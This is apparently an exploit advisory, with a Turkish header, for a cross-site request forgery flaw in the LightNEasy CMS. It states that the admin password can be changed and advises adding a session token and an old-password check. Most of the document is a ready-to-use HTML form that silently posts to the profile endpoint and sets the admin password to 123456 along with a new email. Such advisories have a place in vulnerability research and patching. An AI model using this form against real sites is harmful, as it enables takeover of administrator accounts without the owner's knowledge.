< ------------------- header data start ------------------- >

#############################################################

# Application Name : LightNEasy

# vulnerable Type : XSRF

# Infection : Admin sifresi degistirilebilir ..

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli , eski sifre sorulmalidir ..

# author : _iLLeqaL_ ~ Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

<form name=form1 id=form1 method=post action=http://[site].com/[yol]/?do=profile />
<input name=handle type=hidden value=admin />
<input name=password type=hidden size=20 maxlength=20 value=123456 />
<input name=repeatpassword type=hidden size=20 maxlength=20 value=123456 />
<input name=email type=hidden size=20 maxlength=50 value=[email protected] />
<input type=hidden name=submit value=saveprofile />
<input type=hidden name=userid value=1 />
<input type=submit name=aaa value=Save changes />
</form>

< -- bug code end of -- >